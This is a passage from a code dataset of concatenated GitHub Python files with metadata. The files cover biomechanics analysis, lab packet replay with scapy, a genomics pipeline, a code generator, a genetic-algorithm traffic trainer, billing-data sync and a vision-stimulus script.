Node_x=Mesh_x.node.to(dtype).to(device)\n\n aorta_model=AortaFEModel(Node_x, Element, Node_X, boundary0, boundary1, Element_surface_pressure,\n Mat, cal_1pk_stress, cal_cauchy_stress, dtype, device, mode='inflation')\n out=aorta_model.cal_energy_and_force(pressure)\n\n TPE1=out['TPE1']; TPE2=out['TPE2']; SE=out['SE']\n force_int=out['force_int']; force_ext=out['force_ext']\n force_int_of_element=out['force_int_of_element'].detach()\n loss1=((force_int-force_ext)**2).sum(dim=1).sqrt().mean().item()\n loss1_list.append(loss1)\n force_avg=(force_int_of_element**2).sum(dim=2).sqrt().mean()\n force_res=((force_int-force_ext)**2).sum(dim=1).sqrt()\n R=force_res/(force_avg+1e-10)\n Rmean=R.mean().item()\n Rmax=R.max().item()\n Rmax_list.append(Rmax)\n Rmean_list.append(Rmean)\n #-----------\n try:\n auc10 = roc_auc_score(result_test[3]>0.10, Rmean_list)\n auc05 = roc_auc_score(result_test[3]>0.05, Rmean_list)\n auc01 = roc_auc_score(result_test[3]>0.01, Rmean_list)\n except:\n auc10=0.5\n auc05=0.5\n auc01=0.5\n auc_list_Rmean10.append(auc10)\n auc_list_Rmean05.append(auc05)\n auc_list_Rmean01.append(auc01)\n #----------------------------\n try:\n auc10 = roc_auc_score(result_test[3]>0.10, Rmax_list)\n auc05 = roc_auc_score(result_test[3]>0.05, Rmax_list)\n auc01 = roc_auc_score(result_test[3]>0.01, Rmax_list)\n except:\n auc10=0.5\n auc05=0.5\n auc01=0.5\n auc_list_Rmax10.append(auc10)\n auc_list_Rmax05.append(auc05)\n auc_list_Rmax01.append(auc01)\n #----------------------------\n try:\n auc10 = roc_auc_score(result_test[3]>0.10, loss1_list)\n auc05 = roc_auc_score(result_test[3]>0.05, loss1_list)\n auc01 = roc_auc_score(result_test[3]>0.01, loss1_list)\n except:\n auc10=0.5\n auc05=0.5\n auc01=0.5\n auc_list_loss10.append(auc10)\n auc_list_loss05.append(auc05)\n auc_list_loss01.append(auc01)\n #----------------------------\n fig, ax = plt.subplots()\n #ax.hist(result_test[3], bins=100)\n ax.plot(rec_error_test, result_test[3], '.')\n #ax.set_ylim(0,1)\n ax.set_title(name)\n ax.set_xlabel(str(auc10)+' '+str(auc05)+' '+str(auc01))\n#%%\n\ndf=pd.DataFrame()\ndf['method']=['rec', \"loss1\", 'Rmean', 'Rmax']\nfor k in range(0, len(Best_list)):\n name=Best_list[k][0:3]\n df[name]=[auc_list_rec10[k], auc_list_loss10[k], auc_list_Rmean10[k], auc_list_Rmax10[k]]\nprint(df)\ndf.to_csv(folder_result+\"ood_detection_0.10.csv\", index=False)\n\ndf=pd.DataFrame()\ndf['method']=['rec', \"loss1\", 'Rmean', 'Rmax']\nfor k in range(0, len(Best_list)):\n name=Best_list[k][0:3]\n df[name]=[auc_list_rec05[k], auc_list_loss05[k], auc_list_Rmean05[k], auc_list_Rmax05[k]]\nprint(df)\ndf.to_csv(folder_result+\"ood_detection_0.05.csv\", index=False)\n\ndf=pd.DataFrame()\ndf['method']=['rec', \"loss1\", 'Rmean', 'Rmax']\nfor k in range(0, len(Best_list)):\n name=Best_list[k][0:3]\n df[name]=[auc_list_rec01[k], auc_list_loss01[k], auc_list_Rmean01[k], auc_list_Rmax01[k]]\nprint(df)\ndf.to_csv(folder_result+\"ood_detection_0.01.csv\", index=False)\n\n","repo_name":"liangbright/DNN_FEM_Integration","sub_path":"analyze_surrogate_shape_x_c_use_meanshape_new1.py","file_name":"analyze_surrogate_shape_x_c_use_meanshape_new1.py","file_ext":"py","file_size_in_byte":11263,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"15194907620","text":"from scapy.all import rdpcap, IP, sendp\n\n# Path to your Wireshark capture file\ncapture_file = \"/home/sctsim/copied_from_wipac/copy_folder/already_extracted_files/Module12345/Run_Wireshark_Capture.pcapng\"\n\n# Read the capture file\npackets = rdpcap(capture_file)\n\nfor packet in packets:\n if IP in packet:\n # Change the destination IP address\n packet[IP].dst = \"192.168.1.61\"\n\n # Send the packet\n sendp(packet)\n\n","repo_name":"brycehoecker/TargetLibraries_sctsim","sub_path":"readAndSendWireshark.py","file_name":"readAndSendWireshark.py","file_ext":"py","file_size_in_byte":439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4704222223","text":"\"\"\"\n=====================\nMappability pipeline\n=====================\n\nPipeline to count mappable bases in a given genome\n\n\"\"\"\nimport sys\nimport os\n\nfrom ruffus import *\nimport CGAT.Experiment as E\nimport CGATPipelines.Pipeline as P\n\n\n###################################################\n# Pipeline configuration\n###################################################\nP.getParameters(\n [\"%s/pipeline.ini\" % os.path.splitext(__file__)[0],\n \"../pipeline.ini\",\n \"pipeline.ini\"],\n defaults={\n 'paired_end': False})\n\nPARAMS = P.PARAMS\n\n\n@files(os.path.join(PARAMS[\"gem_dir\"], PARAMS[\"genome\"] + \".gem\"),\n PARAMS[\"genome\"] + \".mappability\")\ndef calculateMappability(infile, outfile):\n '''Calculate mappability using GEM '''\n index = P.snip(infile, \".gem\")\n statement = '''gem-mappability\n -t %(gem_threads)s -m %(gem_mismatches)s\n --max-indel-length %(gem_max_indel_length)s\n -l %(gem_window_size)s -I %(index)s -o %(outfile)s '''\n P.run()\n\n###################################################################\n\n\n@transform(calculateMappability, suffix(\".mappability\"), \".mappability.count\")\ndef countMappableBases(infile, outfile):\n '''Count mappable bases in genome'''\n statement = '''cat %(infile)s | tr -cd ! | wc -c > %(outfile)s'''\n P.run()\n\n###################################################################\n\n\n@transform(countMappableBases, suffix(\".count\"), \".count.load\")\ndef loadMappableBases(infile, outfile):\n '''load count of mappable bases in genome'''\n header = \"total_mappable_bases\"\n statement = '''cat %(infile)s | cgat csv2db\n --table=total_mappable_bases\n --header-names=%(header)s\n > %(outfile)s '''\n P.run()\n\n###################################################################\n\n\n@transform(calculateMappability, suffix(\".mappability\"), \".split.log\")\ndef splitMappabiliyFileByContig(infile, outfile):\n '''Count mappable bases in genome'''\n track = P.snip(os.path.basename(infile), \".mappability\")\n statement = '''mkdir contigs; \n csplit -k -f contigs/contig %(infile)s '/^~[a-zA-Z]/' {100000} > %(outfile)s;\n rm contigs/contig00;'''\n P.run()\n\n###################################################################\n\n\n@follows(splitMappabiliyFileByContig)\n@merge(\"contigs/contig*\", PARAMS[\"genome\"] + \"_mappability_per_contig.tsv\")\ndef countMappableBasesPerContig(infiles, outfile):\n '''Count mappable bases for each contig'''\n for infile in infiles:\n statement = '''grep '~' %(infile)s | sed s/~//g >> %(outfile)s; cat %(infile)s | tr -cd ! | wc -c >> %(outfile)s'''\n P.run()\n\n statement = '''sed -i '{N;s/\\\\n/\\\\t/g}' %(outfile)s;'''\n P.run()\n\n###################################################################\n\n\n@transform(countMappableBasesPerContig, suffix(\".tsv\"), \".tsv.load\")\ndef loadMappableBasesPerContig(infile, outfile):\n '''load count of mappable bases per contig '''\n header = \"contig,mappable_bases\"\n statement = '''cat %(infile)s | cgat csv2db\n --table=mappable_bases_per_contig\n --header-names=%(header)s\n > %(outfile)s '''\n P.run()\n\n###################################################################\n###################################################################\n###################################################################\n\n\n@follows(calculateMappability, countMappableBases,\n loadMappableBases, splitMappabiliyFileByContig,\n countMappableBasesPerContig, loadMappableBasesPerContig)\ndef full():\n '''Count mappable bases in genome'''\n pass\n\nif __name__ == \"__main__\":\n sys.exit(P.main(sys.argv))\n","repo_name":"CGATOxford/CGATPipelines","sub_path":"obsolete/pipeline_mappability.py","file_name":"pipeline_mappability.py","file_ext":"py","file_size_in_byte":3731,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"54"} +{"seq_id":"18632090088","text":"from abc import ABC, abstractmethod\nfrom collections import defaultdict\nfrom functools import lru_cache\nfrom pathlib import Path\nfrom typing import (\n TYPE_CHECKING,\n Any,\n ClassVar,\n DefaultDict,\n Dict,\n FrozenSet,\n Iterator,\n List,\n Optional,\n Set,\n Tuple,\n Union,\n)\n\nfrom jinja2 import Environment, FileSystemLoader, Template\nfrom pydantic import BaseModel\n\nfrom datamodel_code_generator import cached_property\nfrom datamodel_code_generator.imports import IMPORT_ANNOTATED, IMPORT_OPTIONAL, Import\nfrom datamodel_code_generator.reference import Reference, _BaseModel\nfrom datamodel_code_generator.types import DataType, chain_as_tuple\n\nTEMPLATE_DIR: Path = Path(__file__).parents[0] / 'template'\n\nOPTIONAL: str = 'Optional'\n\nALL_MODEL: str = '#all#'\n\n\nclass ConstraintsBase(BaseModel):\n ...\n\n\nclass DataModelFieldBase(_BaseModel):\n name: Optional[str]\n default: Optional[Any]\n required: bool = False\n alias: Optional[str]\n data_type: DataType\n constraints: Any = None\n strip_default_none: bool = False\n nullable: Optional[bool] = None\n parent: Optional[Any] = None\n extras: Dict[str, Any] = {}\n use_annotated: bool = False\n _exclude_fields: ClassVar[Set[str]] = {'parent'}\n _pass_fields: ClassVar[Set[str]] = {'parent', 'data_type'}\n\n if not TYPE_CHECKING:\n\n def __init__(self, **data: Any):\n super().__init__(**data)\n if self.data_type.reference or self.data_type.data_types:\n self.data_type.parent = self\n\n @property\n def type_hint(self) -> str:\n type_hint = self.data_type.type_hint\n\n if not type_hint:\n return OPTIONAL\n elif self.nullable is not None:\n if self.nullable:\n return f'{OPTIONAL}[{type_hint}]'\n return type_hint\n elif self.required:\n return type_hint\n return f'{OPTIONAL}[{type_hint}]'\n\n @property\n def imports(self) -> Tuple[Import, ...]:\n imports: List[Union[Tuple[Import], Iterator[Import]]] = [\n self.data_type.all_imports\n ]\n if self.nullable or (self.nullable is None and not self.required):\n imports.append((IMPORT_OPTIONAL,))\n if self.use_annotated:\n imports.append((IMPORT_ANNOTATED,))\n return chain_as_tuple(*imports)\n\n @property\n def unresolved_types(self) -> FrozenSet[str]:\n return self.data_type.unresolved_types\n\n @property\n def field(self) -> Optional[str]:\n \"\"\"for backwards compatibility\"\"\"\n return None\n\n @property\n def method(self) -> Optional[str]:\n return None\n\n @property\n def represented_default(self) -> str:\n return repr(self.default)\n\n @property\n def annotated(self) -> Optional[str]:\n return None\n\n\n@lru_cache()\ndef get_template(template_file_path: Path) -> Template:\n loader = FileSystemLoader(str(TEMPLATE_DIR / template_file_path.parent))\n environment: Environment = Environment(loader=loader)\n return environment.get_template(template_file_path.name)\n\n\ndef get_module_path(name: str, file_path: Optional[Path]) -> List[str]:\n if file_path:\n return [\n *file_path.parts[:-1],\n file_path.stem,\n *name.split('.')[:-1],\n ]\n return name.split('.')[:-1]\n\n\ndef get_module_name(name: str, file_path: Optional[Path]) -> str:\n return '.'.join(get_module_path(name, file_path))\n\n\nclass TemplateBase(ABC):\n @property\n @abstractmethod\n def template_file_path(self) -> Path:\n raise NotImplementedError\n\n @cached_property\n def template(self) -> Template:\n return get_template(self.template_file_path)\n\n @abstractmethod\n def render(self) -> str:\n raise NotImplementedError\n\n def _render(self, *args: Any, **kwargs: Any) -> str:\n return self.template.render(*args, **kwargs)\n\n def __str__(self) -> str:\n return self.render()\n\n\nclass BaseClassDataType(DataType):\n ...\n\n\nclass DataModel(TemplateBase, ABC):\n TEMPLATE_FILE_PATH: ClassVar[str] = ''\n BASE_CLASS: ClassVar[str] = ''\n DEFAULT_IMPORTS: ClassVar[Tuple[Import, ...]] = ()\n\n def __init__(\n self,\n *,\n reference: Reference,\n fields: List[DataModelFieldBase],\n decorators: Optional[List[str]] = None,\n base_classes: Optional[List[Reference]] = None,\n custom_base_class: Optional[str] = None,\n custom_template_dir: Optional[Path] = None,\n extra_template_data: Optional[DefaultDict[str, Dict[str, Any]]] = None,\n methods: Optional[List[str]] = None,\n path: Optional[Path] = None,\n description: Optional[str] = None,\n ) -> None:\n if not self.TEMPLATE_FILE_PATH:\n raise Exception('TEMPLATE_FILE_PATH is undefined')\n\n template_file_path = Path(self.TEMPLATE_FILE_PATH)\n if custom_template_dir is not None:\n custom_template_file_path = custom_template_dir / template_file_path.name\n if custom_template_file_path.exists():\n template_file_path = custom_template_file_path\n self._template_file_path = template_file_path\n\n self.fields: List[DataModelFieldBase] = fields or []\n self.decorators: List[str] = decorators or []\n self._additional_imports: List[Import] = []\n self.custom_base_class = custom_base_class\n if base_classes:\n self.base_classes: List[BaseClassDataType] = [\n BaseClassDataType(reference=b) for b in base_classes\n ]\n else:\n self.set_base_class()\n\n self.file_path: Optional[Path] = path\n self.reference: Reference = reference\n\n self.reference.source = self\n\n self.extra_template_data = (\n extra_template_data[self.name]\n if extra_template_data is not None\n else defaultdict(dict)\n )\n\n for base_class in self.base_classes:\n if base_class.reference:\n base_class.reference.children.append(self)\n\n if extra_template_data:\n all_model_extra_template_data = extra_template_data.get(ALL_MODEL)\n if all_model_extra_template_data:\n self.extra_template_data.update(all_model_extra_template_data)\n\n self.methods: List[str] = methods or []\n\n self.description = description\n for field in self.fields:\n field.parent = self\n\n self._additional_imports.extend(self.DEFAULT_IMPORTS)\n\n def set_base_class(self) -> None:\n base_class_import = Import.from_full_path(\n self.custom_base_class or self.BASE_CLASS\n )\n self._additional_imports.append(base_class_import)\n self.base_classes = [BaseClassDataType.from_import(base_class_import)]\n\n @property\n def template_file_path(self) -> Path:\n return self._template_file_path\n\n @property\n def imports(self) -> Tuple[Import, ...]:\n return chain_as_tuple(\n (i for f in self.fields for i in f.imports),\n self._additional_imports,\n )\n\n @property\n def reference_classes(self) -> FrozenSet[str]:\n return frozenset(\n {r.reference.path for r in self.base_classes if r.reference}\n | {t for f in self.fields for t in f.unresolved_types}\n )\n\n @property\n def name(self) -> str:\n return self.reference.name\n\n @property\n def base_class(self) -> str:\n return ', '.join(b.type_hint for b in self.base_classes)\n\n @property\n def class_name(self) -> str:\n if '.' in self.name:\n return self.name.rsplit('.', 1)[-1]\n return self.name\n\n @property\n def module_path(self) -> List[str]:\n return get_module_path(self.name, self.file_path)\n\n @property\n def module_name(self) -> str:\n return get_module_name(self.name, self.file_path)\n\n @property\n def all_data_types(self) -> Iterator['DataType']:\n for field in self.fields:\n yield from field.data_type.all_data_types\n yield from self.base_classes\n\n @cached_property\n def path(self) -> str:\n return self.reference.path\n\n def render(self) -> str:\n response = self._render(\n class_name=self.class_name,\n fields=self.fields,\n decorators=self.decorators,\n base_class=self.base_class,\n methods=self.methods,\n description=self.description,\n **self.extra_template_data,\n )\n return response\n","repo_name":"VladimirZHC/OpenApiGenerator","sub_path":"venv/lib/python3.8/site-packages/datamodel_code_generator/model/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":8539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3954914776","text":"# accepts 2 strings, a and b\n# finds longest common subsequence, and returns the value of lcs string\ndef lcs(a, b):\n A, B = len(a), len(b)\n dp = [[''] * (B + 1) for _ in range(A + 1)]\n for i in range(1, A + 1):\n for j in range(1, B + 1):\n if a[i - 1] == b[j - 1]: dp[i][j] = dp[i - 1][j - 1] + a[i - 1] \n else: dp[i][j] = dp[i-1][j] if len(dp[i-1][j]) > len(dp[i][j - 1]) else dp[i][j - 1]\n return dp[A][B]","repo_name":"ak-19/Essential-Algorithms","sub_path":"subsequences/lcs.py","file_name":"lcs.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26337847884","text":"from geneticAlgo import Population \nfrom os import mkdir\n\npopulation_size = 70\nnum_of_generation = 3000\nmutate_prob = 0.1\nretain_prob = 0.03\nselect_prob = 0.4\ntype_evolution = 1 # 1 for no crossover, 0 for crossover\ndimensions = (8, 10, 5, 1)\ntraining_no = 8\ntraffic = 1.0\n\nclass Train:\n \n def __init__(self):\n mkdir(\"./results/training\"+str(training_no))\n with open(\"./results/training\"+str(training_no)+\"/logs.txt\", \"w\") as file:\n file.write(\"population_size : \" + str(population_size) + \"\\n\")\n file.write(\"num_of_generation : \" + str(num_of_generation) + \"\\n\")\n file.write(\"mutate_prob : \" + str(mutate_prob) + \"\\n\")\n file.write(\"retain_prob : \" + str(retain_prob) + \"\\n\")\n file.write(\"select_prob : \" + str(select_prob) + \"\\n\")\n file.write(\"type_evolution : \" + str(type_evolution) + \"\\n\")\n file.write(\"dimensions : \" + str(dimensions) + \"\\n\")\n file.write(\"training_no : \" + str(training_no) + \"\\n\")\n file.write(\"traffic : \" + str(traffic) + \"\\n\")\n self.population = Population(population_size,mutate_prob,retain_prob,select_prob, dimensions, training_no, traffic)\n self.best = None\n\n def execute(self):\n for generation in range(num_of_generation):\n with open(\"./results/training\"+str(training_no)+\"/res.txt\", \"a\") as file:\n file.write(\"Generation No : \"+str(generation)+\"\\n\\n\")\n self.population.runSimulation()\n self.population.evolve(type_evolution)\n self.best = self.population.population_fitness\n with open(\"./results/training\"+str(training_no)+\"/res.txt\", \"a\") as file:\n file.write(\"Generation best : \" + str(self.best) + \"\\n\\n\\n\")\n self.bestModel = self.population.bestModel\n\ntrain = Train()\ntrain.execute()\n\n","repo_name":"rishabh7699/traffic_sumo","sub_path":"source/Train.py","file_name":"Train.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"69985790241","text":"import json\nimport logging\n\nfrom esdlvalidator.core.exceptions import NameAlreadyExists, InvalidJSON, SchemaNotFound\n\nfrom tinydb import TinyDB, Query\nfrom os import path\n\nfrom esdlvalidator.validation.abstract_repository import SchemaRepository\n\nlogger = logging.getLogger(__name__)\n\n\nclass FileSchemaRepository(SchemaRepository):\n \"\"\"Repository for retrieving, adding, deleting validation schemas\"\"\"\n\n def __init__(self, location: str):\n \"\"\"Create a repository and initialize the 'database' from the given file\"\"\"\n\n if not path.exists(location):\n try:\n f = open(location, \"x\")\n logger.info(\"Created database file {0}\".format(location))\n except:\n msg = \"Unable to create database file: {0}\".format(location)\n logger.critical(msg)\n raise OSError(msg)\n\n self.db = TinyDB(location)\n self.table = self.db.table(\"schema\")\n\n def get_all(self):\n \"\"\"Retrieve all schema's\"\"\"\n\n documents = self.table.all()\n for doc in documents:\n doc[\"id\"] = doc.doc_id\n return documents\n\n def get_by_id(self, id: int):\n \"\"\"Retrieve a schema by ID\n\n Args:\n id (int): ID of the schema\n\n Returns:\n schema (Document): Validation schema\n\n Raises:\n SchemaNotFound: Validation schema was not found\n \"\"\"\n\n id = self.__id_to_int(id)\n\n if not self.table.contains(doc_id=id):\n raise SchemaNotFound(msg=\"Requested schema with id {0} not found\".format(id))\n\n return self.table.get(doc_id=id)\n\n def get_by_ids(self, ids: list):\n \"\"\"Retrieve multiple schemas by a list of id's\n\n Args:\n ids (list): List with schema id's\n\n Returns:\n schemas: One or more validation schema\n\n Raises:\n SchemaNotFound: One of the validation schemas was not found\n \"\"\"\n\n schemas = []\n for id in ids:\n id = self.__id_to_int(id)\n if not self.table.contains(doc_id=id):\n raise SchemaNotFound(msg=\"Requested schema with id {0} not found\".format(id))\n\n schema = self.table.get(doc_id=id)\n schema['id'] = id\n schemas.append(schema)\n\n return schemas\n\n def get_by_name(self, name: str):\n \"\"\"Retrieve a schema by name\n\n Args:\n name (string): Name of the schema\n\n Returns:\n schema: Validation schema\n\n Raises:\n SchemaNotFound: Validation schema was not found\n \"\"\"\n\n Schema = Query()\n schemas = self.table.search(Schema.name == name)\n\n if len(schemas) == 0:\n raise SchemaNotFound(msg=\"Requested schema with name {0} not found\".format(name))\n\n # return schema 0 since name should be unique and there should be no other schemas\n return schemas[0]\n\n def insert(self, jsonString: str):\n \"\"\"Insert a new schema\n\n Args:\n json (string): The schema JSON string\n\n Returns:\n schemaID: The created id for the schema, can be used to retrieve the schema\n\n Raises:\n InvalidJSON: If json is not a valid json string or schema name already exist\n NameAlreadyExists: If database already contains a document with the same name\n \"\"\"\n\n try:\n document = json.loads(jsonString)\n except:\n raise InvalidJSON\n\n Schema = Query()\n schemas = self.table.search(Schema.name == document[\"name\"])\n if len(schemas) != 0:\n raise NameAlreadyExists\n\n schemaID = self.table.insert(document)\n return schemaID\n\n def remove_by_id(self, id: int):\n \"\"\"Remove schema by ID\n\n Args:\n id (int): Schema id\n\n Returns:\n schemaID: schema id when found\n\n Raises:\n SchemaNotFound: Validation schema was not found\n \"\"\"\n\n id = self.__id_to_int(id)\n\n if not self.table.contains(doc_id=id):\n raise SchemaNotFound(msg=\"Unable to remove, no schema found for id: {0}\".format(id))\n\n removed = self.table.remove(doc_ids=[id])\n return removed[0]\n\n def update(self, id: int, jsonString: str):\n \"\"\"Update schema by id\n\n Args:\n id (int): Schema id\n jsonString (string): schema json string\n\n Returns:\n schemaID: The updated id of the schema\n\n Raises:\n InvalidJSON: If json is not a valid json string or schema name already exist\n SchemaNotFound: Validation schema was not found\n \"\"\"\n\n id = self.__id_to_int(id)\n\n if not self.table.contains(doc_id=id):\n raise SchemaNotFound\n\n try:\n document = json.loads(jsonString)\n except:\n raise InvalidJSON\n\n self.table.update(document, doc_ids=[id])\n return id\n\n def __id_to_int(self, id):\n try:\n return int(id)\n except:\n raise SchemaNotFound(msg=\"Requested schema with id {0} not found\".format(id))\n","repo_name":"ESDLMapEditorESSIM/ESDLValidator","sub_path":"esdlvalidator/validation/file_repository.py","file_name":"file_repository.py","file_ext":"py","file_size_in_byte":5136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22915603050","text":"# -*- coding: utf-8 -*-\n\nfrom openerp import api, fields, models\n\n\nclass WizardJobScaleDownModel(models.TransientModel):\n _name = 'wizard.job.scale.down.model'\n\n line_id = fields.Many2one('hr.job.move.grade.line', string=u'الوظيفة', required=1)\n job_id = fields.Many2one('hr.job', related='line_id.job_id', string=u'الوظيفة', required=1)\n\n @api.onchange('job_id')\n def _onchange_job_id(self):\n res = {}\n job_ids = []\n if not self.job_id:\n move_ids = self.env['hr.job.move.grade'].search([('move_type', '=', 'scale_down'), ('state', '!=', 'done')])\n if move_ids:\n for rec in move_ids:\n job_ids += [line.job_id.id for line in rec.job_movement_ids]\n res['domain'] = {'job_id': [('id', 'in', job_ids)]}\n return res\n # return empty job list\n res['domain'] = {'job_id': [('id', '=', -1)]}\n return res\n\n\n @api.multi\n def print_report(self):\n report_action = self.env['report'].get_action(self, 'smart_hr.report_job_scale_down_model')\n data = {'ids': [], 'form': self.read([])[0]}\n report_action['data'] = data\n return report_action\n","repo_name":"rouag/orvea","sub_path":"smart_hr/job/wizard/wizard_job_scale_down_model.py","file_name":"wizard_job_scale_down_model.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"30554740301","text":"import decimal\nfrom datetime import datetime\n\nfrom django.db import transaction\nfrom django.utils import timezone\n\nfrom fleio.core.models import Client\nfrom fleio.core.models import ClientStatus\nfrom whmcsync.whmcsync.exceptions import DBSyncException\nfrom whmcsync.whmcsync.models import SyncedAccount\nfrom whmcsync.whmcsync.models import Tblclients\nfrom whmcsync.whmcsync.operations import add_client_groups\nfrom whmcsync.whmcsync.operations import match_currency\nfrom whmcsync.whmcsync.operations import sync_client_credit\nfrom whmcsync.whmcsync.sync.client_contacts import sync_client_contacts\nfrom whmcsync.whmcsync.sync.utils import FieldToSync\nfrom whmcsync.whmcsync.sync.utils import sync_fields\nfrom whmcsync.whmcsync.utils import WHMCS_LOGGER\n\n\nclass ClientField(FieldToSync):\n record_name = 'Client'\n\n\nCLIENT_FIELDS_TO_SYNC = [\n ClientField(fleio_key='first_name', whmcs_key='firstname', fleio_max_length=127),\n ClientField(fleio_key='last_name', whmcs_key='lastname', fleio_max_length=127),\n ClientField(fleio_key='company', whmcs_key='companyname', fleio_max_length=127),\n ClientField(fleio_key='address1', whmcs_key='address1', fleio_max_length=255),\n ClientField(fleio_key='address2', whmcs_key='address2', fleio_max_length=255),\n ClientField(fleio_key='city', whmcs_key='city', fleio_max_length=127),\n ClientField(fleio_key='country', whmcs_key='country', fleio_max_length=2),\n ClientField(fleio_key='state', whmcs_key='state', fleio_max_length=127),\n ClientField(fleio_key='zip_code', whmcs_key='postcode', fleio_max_length=10),\n ClientField(fleio_key='phone', whmcs_key='phonenumber', fleio_max_length=64),\n ClientField(fleio_key='vat_id', whmcs_key='tax_id', fleio_max_length=32),\n ClientField(fleio_key='tax_exempt', whmcs_key='taxexempt'),\n]\n\n\ndef sync_client(id, whmcs_client=None):\n \"\"\"Synchronizes WHMCS clients.\"\"\"\n add_partially_synced_account = False\n if whmcs_client is None:\n try:\n whmcs_client = Tblclients.objects.get(id=id)\n except (Tblclients.DoesNotExist, ValueError):\n raise DBSyncException('WHMCS client ID %s is not valid.' % id)\n\n # check if client already exists from a previous import\n synced_account = SyncedAccount.objects.filter(\n whmcs_id=whmcs_client.pk,\n whmcs_uuid=whmcs_client.uuid,\n subaccount=False\n ).first()\n if synced_account:\n client = synced_account.client\n else:\n add_partially_synced_account = True # we shall add a synced account without user for later use\n # check if client already exists because of using fleio-whmcs module\n # and not because of using a previous import\n client = Client.objects.filter(external_billing_id=whmcs_client.uuid).first()\n\n if not client:\n client = Client()\n\n # process client fields\n sync_fields(fleio_record=client, whmcs_record=whmcs_client, fields_to_sync=CLIENT_FIELDS_TO_SYNC)\n\n whmcs_status_to_fleio = whmcs_client.status.lower()\n if whmcs_status_to_fleio not in ClientStatus.name_map.keys():\n WHMCS_LOGGER.warning(\n 'WHMCS client {} status not compatible with Fleio statuses. Fallback on inactive status.'.format(id)\n )\n whmcs_status_to_fleio = ClientStatus.inactive\n client.status = whmcs_status_to_fleio\n\n client.currency = match_currency(whmcs_client)\n client.uptodate_credit = decimal.Decimal('0.00')\n\n if whmcs_client.created_at:\n client.date_created = whmcs_client.created_at\n elif whmcs_client.datecreated:\n whmcs_date_created = datetime.combine(whmcs_client.datecreated, datetime.min.time())\n whmcs_date_created = timezone.make_aware(whmcs_date_created, timezone=timezone.utc)\n client.date_created = whmcs_date_created\n\n with transaction.atomic():\n client.save()\n sync_client_credit(fleio_client=client, amount=whmcs_client.credit, currency_code=whmcs_client.currency.code)\n\n if add_partially_synced_account:\n # add new synced account without user (will be populated later)\n SyncedAccount.objects.create(\n whmcs_id=whmcs_client.id,\n whmcs_uuid=whmcs_client.uuid,\n client=client,\n user=None,\n subaccount=False\n )\n add_client_groups(fleio_client=client, whmcs_client=whmcs_client)\n sync_client_contacts(fleio_client=client, whmcs_client=whmcs_client)\n return whmcs_client.id\n\n\ndef sync_clients(fail_fast, whmcs_ids=None):\n \"\"\"Synchronizes all WHMCS clients and users.\"\"\"\n exception_list = []\n client_list = []\n qs = Tblclients.objects.all()\n if whmcs_ids and isinstance(whmcs_ids, list) and len(whmcs_ids):\n qs = qs.filter(id__in=whmcs_ids)\n for client in qs:\n try:\n synced_id = sync_client(id=client.id, whmcs_client=client)\n client_list.append('{} {} - {} (ID: {})'.format(client.firstname,\n client.lastname,\n client.companyname,\n synced_id))\n except Exception as ex:\n WHMCS_LOGGER.exception(ex)\n exception_list.append(ex)\n if fail_fast:\n break\n\n return client_list, exception_list\n","repo_name":"fleio/whmcs2fleio","sub_path":"whmcsync/sync/clients.py","file_name":"clients.py","file_ext":"py","file_size_in_byte":5377,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"36687017699","text":"# your code goes here\ns=input()\nl=list(s)\nj=len(l)-1\nc=0\nfor i in s:\n\tif i==l[j] and j>=0:\n\t\tc=c+1\n\t\tj=j-1\n\telse:\n\t\tbreak\nif c==len(l):\n\tprint(\"YES\")\nelse:\n\tprint(\"NO\")\n #link list\n","repo_name":"Ponkiruthika112/codekataset1","sub_path":"link_pal/link_pal.py","file_name":"link_pal.py","file_ext":"py","file_size_in_byte":181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18049237026","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jun 11 16:37:42 2022\n\n@author: jtm545\n\nScript to make the stimuli for the MonBin2 experiment. \n\"\"\"\nimport os\nimport os.path as op\nfrom pprint import pprint\nimport pickle\nfrom datetime import datetime\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nfrom pysilsub.problems import SilentSubstitutionProblem as SSP\n\n# %% ~~~ PLOT STYLE ~~~\n\nplt.style.use('seaborn')\nplt.rcParams['font.size'] = 14\nplt.rcParams['font.family'] = 'Helvetica'\n\n# %% Functions\n\n\ndef check_exists(folder: str) -> str:\n if not op.exists(folder):\n os.makedirs(folder)\n return folder\n\n\n# %% ~~~ CONSTANTS ~~~\n\n\nMINTENSITY = 0\nMAXTENSITY = 4095\nBACKGROUND = MAXTENSITY/2\nFs = 100 # STLAB switching time\nMAX_S_CONE_CONTRAST = .45\n\n\n# %% ~~~ MAIN SCRIPT ~~~\n\ndef main():\n\n gamma_folder = check_exists('./gamma/')\n\n # Load predictive models for each device and plug in the observer\n S1 = SSP.from_json('./STLAB_1_York.json')\n S2 = SSP.from_json('./STLAB_2_York.json')\n\n # We know that the two devices differ slightly in output. Here we obtain\n # a calibration ratio for each LED that *may* be used to perform a simple\n # correction later.\n S1_S2_calibration_ratio = (\n S1.calibration.groupby(level=0).sum().sum(axis=1)\n / S2.calibration.groupby(level=0).sum().sum(axis=1)\n )\n print('> S1/S2 LED calibration ratio')\n print(S1_S2_calibration_ratio)\n S1_S2_calibration_ratio.to_csv('./S1_S2_calibration_ratio.csv')\n\n # To scale Y-axis for calibration plots\n max_counts = max(S1.calibration.max().max(), S2.calibration.max().max())\n\n # Plot the calibration spds, do the gamma corrections, save output, etc.\n for device in [S1, S2]:\n # 